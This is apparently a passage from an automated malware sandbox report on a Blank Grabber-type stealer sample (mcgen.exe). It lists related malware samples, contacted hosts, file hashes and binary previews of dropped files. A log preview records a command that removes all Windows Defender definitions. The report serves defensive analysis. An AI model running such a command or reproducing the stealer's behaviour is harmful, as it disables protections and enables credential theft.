	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
api.telegram.org	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	MatAugust.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
TUT-ASUS	intro.avi.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	208.95.112.1
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll	AimStar.exe	Get hash	malicious	Blank Grabber	Browse
	DChOtFdp9T.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse
	wp-cent.exe	Get hash	malicious	Python BackDoor	Browse
	wp-cent.exe	Get hash	malicious	Python BackDoor	Browse
	WTvNL75dCr.exe	Get hash	malicious	Python BackDoor	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	692515
Entropy (8bit):	7.9276972423716785
Encrypted:	false
SSDEEP:	12288:a+0pc7Em5/b4/FEcuYM5diEa3PZiLE8EtXQBYdxBN/E97Eup47VvgubxU:aB/mBwEcuHudiQ8EtCYdxBNumDK
MD5:	CCF284654A1A8584E0E121EC3A20AD87
SHA1:	018CFE64EA353783ED1ECD95CCA3332BFE81CAB1
SHA-256:	4766E7D87AA6091742C7A920A906A98CF6EC2B7AC17400C545F85E705A794718
SHA-512:	55A241AB056A9F6366E5E6D7118B9B8E8644F48D33BFC5936774B4D14DCDF2711DBAED6F54FD1585EE76F6031D298B8D0A32E6F4CA8BB58DA356B0104FC78143
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g.uWy...So..n.\|...7....m.Lw;L.....m.r.....s.`r....H2.n.-..$.rD.D.(..H".h...{.}.zj.sN.....U.u_k.g=k.}N.....g.=...nc....?.2wzie._.:..+2~..a..r......W.........R..,4..}m$.c.........n...V.....w^...>F...XxU.....gx..(....^!....e..,.l._...YxI...M.1..^.U...3~........__.......s......+s..0~.-.f...'ly.-..3o^...7.d..R.....k`.So.../....&.O.a...b.kc....dK...?....%a.%o.....[.=...).U.G]?.-..Yx.g+[....,...G\_is..k.0~.u..c..-...\|z..];a.?..8.....n..k.m..t...k....,<.....}s........c.....n.....s...R.Y(.[N..z../l{@.k...0.......j....k..=.wE..W...r.qn.)W....].m.o.9....r.....N.....Y7:...'.....J..O....%gGi..+y...+..1..9.[.>.c/.m.-.......].m;..;.x.e.K./..v.tU...o..\.....}.....yQm..]...G_........r......m;...c.u.q--1.w...\|.mG_T[...U.?..y.'+...%.Y.G......>Q.r..eLN.s.[......[8..{h..!.t.......^.@l\|....8G...V..}p/...8..9...R....K..w[..-}b..q......b>...t...y..

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1051564078442047
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrRk9+MlWlLehW51ICJ:QOaqdmOFdjrW+kWResLII
MD5:	D032AC166E09D55C79BD5FA566263178
SHA1:	15107D3B1694036F300438516605D0C6AD697609
SHA-256:	C47674F6D645849DF52B13151C9D5717234426AC0E8590D1DF262B3815289401
SHA-512:	958D04B2847261899238F84DE407A4EDD446D5C78B3A417B3067D7930FBB279FF15F85A0F4EA0452E5C3A8CDCF9CC5E20239F14C290AC909F3B037270A328F61
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.a.n. .. 0.2. .. 2.0.2.5. .0.3.:.2.2.:.2.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.a.n. .. 0.2. .. 2.0.2.5. .0.3.:.2.2.:.2.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES8ED.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Thu Jan 2 10:08:50 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1380
Entropy (8bit):	4.120116382214493
Encrypted:	false
SSDEEP:	24:H6DW9DaEaHd8wK4aukNeI+ycuZhNPTakSm8PNnqSGd:mh9DKd5w1ulra3nqS2
MD5:	19CAE808B2C6261B982056127BAD7164
SHA1:	01C3F0EC1FA28BDB02C211931E0723FF75690551
SHA-256:	1A90D41775585F7C20DCBE3742AD3119F531F177B518E415F7687DE174AF0A4C
SHA-512:	FC5FFECC6C433EECEBE142A172CD81D1FE7681C9A107DF789D5A83BCBAF15FBFEBBD32698972CEAC5333005755BE9B6A830261F7E8BA6D7D7BBB88F41411C762
Malicious:	false
Preview:	L....evg.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........W....c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP................X..*..{...d".@..........6.......C:\Users\user\AppData\Local\Temp\RES8ED.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.w.2.w.i.p.r...d.l.l.....(.....

C:\Users\user\AppData\Local\Temp\WiSkp.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	725998
Entropy (8bit):	7.999758375184993
Encrypted:	true
SSDEEP:	12288:PyJ1534s4KkTWDUWBDfkSk3zCXsk3gygbhyNCjwsJOYwqv1USSDvVUyn:Py15KTW1BM/Ocfygbhy8krSv1Ub7Vpn
MD5:	7C6A381B94995E293EE864DC0948D7A1
SHA1:	02D849DB33F8FE5E7BDAA3EBCB495A61286F5624
SHA-256:	2FA45C74E6E36F16A531EC3D9F5ACF00FBBC610A7E3DF9EC3647F0A243460040
SHA-512:	B8E40C25EA9938A557E67FAD0FEBEDF63F4D7D598173A815B0FA7F2D31FD8A1120CA57B143344D1BEC71F26D6D8BD9AC7BB5DC6604E0ADB3651FA5999C708BD2
Malicious:	true
Preview:	Rar!........!......H.rz..rd..\|..Xh.jeQ'M.%.......P.v.w$...^Y..8.)J....B...6..I..T..iW>J...'.v.H...~h;.L.vY...zJ@.p..?<.......Y....N.}..[T...y]G..d.....#.[..P.r.....".^.R.....@.`.r3.+..3.>..........5.:.L.#S;.....(I8..<.1..+....KG.v.&.E...Y....]B.K....=..5.........e./.L....v...\X..............6...X}r....S..J,.eL'..}L.$Iw...P g.R.rn...^......8..-.D4...3..KD[..,.^$G.-%3../QA...k1.I.K..;...`q'...x3...H...F.w....2.x.v.L..#...@.W.......m#y....>Sk...>.4.cT......!P.#..3-......5`..0.;p.0..+...}.?X:....p....[...kYAF...3....Y=..AMX.A..AF.$&.Z..S. ..tY...BO...;.......xf.C...}..'J...d..h...Z.+..r.D...N..{rC`p....\|..k(....oWq...Q.M.q..D.V.z....jz...}...y.@. .A.3.G% o.?."{.oM^..a.s....{.}g3X....Rb.1p..ed...].-?...E=`.y.......E.Q.My.$.....W.7.....c.^..4....Y.1....z-).:..s...O...X.H..A..xn#OD.bT....%.B........5b..^?h$w!.G...<........N..LLG....33..$.fG.T4E`.mrn......$.cQ0r...db.Vr~.,.. .d.)bXQ1.TY...0..s.f...(.J.1.7J.....t.?U.OI.y).....J....

C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: AimStar.exe, Detection: malicious, Browse Filename: DChOtFdp9T.exe, Detection: malicious, Browse Filename: user.exe, Detection: malicious, Browse Filename: HX Design.exe, Detection: malicious, Browse Filename: YgJ5inWPQO.exe, Detection: malicious, Browse Filename: wp-s2.exe, Detection: malicious, Browse Filename: wp-s2.exe, Detection: malicious, Browse Filename: wp-cent.exe, Detection: malicious, Browse Filename: wp-cent.exe, Detection: malicious, Browse Filename: WTvNL75dCr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	51192
Entropy (8bit):	7.762871670400831
Encrypted:	false
SSDEEP:	1536:fTvumeSe2uD4e4elA5woMImLVQhyUzR9AfIIoT:LvxeSeVd4elAqImLVQLX
MD5:	E1B31198135E45800ED416BD05F8362E
SHA1:	3F5114446E69F4334FA8CDA9CDA5A6081BCA29ED
SHA-256:	43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
SHA-512:	6709C58592E89905263894A99DC1D6AAFFF96ACE930BB35ABFF1270A936C04D3B5F51A70FB5ED03A6449B28CAD70551F3DCCFDD59F9012B82C060E0668D31733
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65016
Entropy (8bit):	7.844438023002735
Encrypted:	false
SSDEEP:	1536:sgnr/ptw33m0QDInUz2fH3JrlFCFfLaImyP7TyUzR9zfIP0:fnrhtoW0QSu+EFfWImyP7UM
MD5:	B6262F9FBDCA0FE77E96A9EED25E312F
SHA1:	6BFB59BE5185CEACA311F7D9EF750A12B971CBD7
SHA-256:	1C0F9C3BDC53C2B24D5480858377883A002EB2EBB57769D30649868BFB191998
SHA-512:	768321758FC78E398A1B60D9D0AC6B7DFD7FD429EF138845461389AAA8E74468E4BC337C1DB829BA811CB58CC48CFFF5C8DE325DE949DDE6D89470342B2C8CE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.Z.\|.4.\|.4.\|.4.u...z.4.m.5.~.4.m.7.x.4.m.0.t.4.m.1.p.4...5.~.4..x0.}.4..x5.z.4...5...4.\|.5...4...9.z.4...4.}.4....}.4...6.}.4.Rich\|.4.........PE..d....WOg.........." ...*.............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122088
Entropy (8bit):	7.904008472378221
Encrypted:	false
SSDEEP:	1536:B3UVX099NzjRjBmFTSki6cbA8VDEcZJDY/LB7cMvVPcc1di9ImvqxEMmTyUzR98K:B3UWVzVjp6cb+SqOMtPc9ImvqxExn
MD5:	9CFB6D9624033002BC19435BAE7FF838
SHA1:	D5EECC3778DE943873B33C83432323E2B7C2E5C2
SHA-256:	41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
SHA-512:	DD6D7631A54CBD4ABD58B0C5A8CB5A10A468E87019122554467FD1D0669B9A270650928D9DE94A7EC059D4ACEBF39FD1CFCEA482FC5B3688E7924AAF1369CC64
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....0.......p....................................................`......................................................................+..........\........................................\|..@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37368
Entropy (8bit):	7.62885373795624
Encrypted:	false
SSDEEP:	768:WzzaDWoin9vvSfhb8pnTImvI9qJyUFRYT2Ip4ygCxf1mlzzF:WzOW6JQTImvI9WyUzR9yRfIPF
MD5:	0B214888FAC908AD036B84E5674539E2
SHA1:	4079B274EC8699A216C0962AFD2B5137809E9230
SHA-256:	A9F24AD79A3D2A71B07F93CD56FC71958109F0D1B79EEBF703C9ED3AC76525FF
SHA-512:	AE7AEE8A11248F115EB870C403DF6FC33785C27962D8593633069C5FF079833E76A74851EF51067CE302B8EA610F9D95C14BE5E62228EBD93570C2379A2D4846
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P..........@........................................@............`.........................................\|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	89592
Entropy (8bit):	7.901406061659478
Encrypted:	false
SSDEEP:	1536:+E29OZvi4bwTlI+rWNp+UavNhym9PcIbiQZWL22eMBYqj8uyDM/2Im01rqyUzR9u:+MviSJj+JymBBBZIheEjMoOIm01rtWO
MD5:	ADEAA96A07B7B595675D9F351BB7A10C
SHA1:	484A974913276D236CB0D5DB669358E215F7FCED
SHA-256:	3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
SHA-512:	5D01D85CDA1597A00B39746506FF1F0F01EEEA1DC2A359FCECC8EE40333613F7040AB6D643FDAEE6ADAA743D869569B9AB28AE56A32199178681F8BA4DEA4E55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..\|...o3..}...o3..v...o3..r....3..}....4..\|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*. .......p........................................................`.........................................4...L....................0.........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29552
Entropy (8bit):	7.411884404531348
Encrypted:	false
SSDEEP:	768:3e8XPAVnB8JpeEIm9UtEJyUFRYT2Ip4mTxf1mlBqsovFfY:TgB8CEIm9Ut4yUzR9GfIQsotfY
MD5:	766820215F82330F67E248F21668F0B3
SHA1:	5016E869D7F65297F73807EBDAF5BA69B93D82BD
SHA-256:	EF361936929B70EF85E070ED89E55CBDA7837441ACAFEEA7EF7A0BB66ADDEEC6
SHA-512:	4911B935E39D317630515E9884E6770E3C3CDBD32378B5D4C88AF22166B79B8EFC21DB501F4FFB80668751969154683AF379A6806B9CD0C488E322BD00C87D0E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.............s......m.......m.......m.......m......{m.......j..............{m......{m......{m......{m......Rich............PE..d....WOg.........." ...*.0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46584
Entropy (8bit):	7.708630278879131
Encrypted:	false
SSDEEP:	768:pOVO07RbhED2LEIuo4OCYkbaEts+Z85iEsaAEwAptjvImywAmmJyUFRYT2Ip4Ep5:GPkD2LEIuo4E5CpZEbjvImywAmKyUzRs
MD5:	65CD246A4B67CC1EAB796E2572C50295
SHA1:	053FA69B725F1789C87D0EF30F3D8997D7E97E32
SHA-256:	4ECD63F5F111D97C2834000FF5605FAC61F544E949A0D470AAA467ABC10B549C
SHA-512:	C5BF499CC3038741D04D8B580B54C3B8B919C992366E4F37C1AF6321A7C984B2E2251C5B2BC8626AFF3D6CA3BF49D6E1CCD803BD99589F41A40F24EC0411DB86
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..\|^..}M..\|_..}M..\|T..}M..\|Q..}..\|^..}\..}...}...\|U..}..\|]..}..\|]..}.>}]..}..\|]..}Rich\..}........PE..d....WOg.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61432
Entropy (8bit):	7.832464272741381
Encrypted:	false
SSDEEP:	1536:6Ze1bxjT8JFeEl4m6MisPI9eATFaImvQgNyUzR9+fIP2:6AbFT8JcEem65sw9eSgImvQgtu
MD5:	F018B2C125AA1ECC120F80180402B90B
SHA1:	CF2078A591F0F45418BAB7391C6D05275690C401
SHA-256:	67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
SHA-512:	C57580AF43BC1243C181D9E1EFBC4AA544DB38650C64F8ECE42FBCBE3B4394FCADB7ACFB83E27FBE4448113DB1E6AF8D894FB4BD708C460CF45C6524FCFDEF96
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95..95..95..A...95...4..95.....95...6..95...1..95...0..95.1.4..95..4..95..94..85.1.8..95.1.5..95.1...95.1.7..95.Rich.95.................PE..d....WOg.........." ...*............`-.......................................P............`..........................................K..P....I.......@.......................K......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70512
Entropy (8bit):	7.839717554547019
Encrypted:	false
SSDEEP:	1536:iDX4m2+uSKd7nh+5qr2UmGPijcXvyOVBbUImL7bJ7yUzR9UfI+vbGVx:KRud7E3U0cXJ/AImL7b/1Vx
MD5:	309B1A7156EBD03474B44F11BA363E89
SHA1:	8C09F8C65CAC5BB1FCF43AF65A7B3E59A9400990
SHA-256:	67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
SHA-512:	E610A92F0E4FA2A6CD9AFD7D8D7A32CC5DF14E99AF689BFB5A4B0811DCA97114BF3FCF4BFAE68600ED2417D18EE88C64C22B0C186068AFD4731BE1DE90C06F15
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^.............~!.....................................-...................4..........-.......-.......-.M.....-.......Rich............PE..d....WOg.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........t............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1396821
Entropy (8bit):	5.531015514770172
Encrypted:	false
SSDEEP:	12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
MD5:	18C3F8BF07B4764D340DF1D612D28FAD
SHA1:	FC0E09078527C13597C37DBEA39551F72BBE9AE8
SHA-256:	6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
SHA-512:	135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
Malicious:	false
Preview:	PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
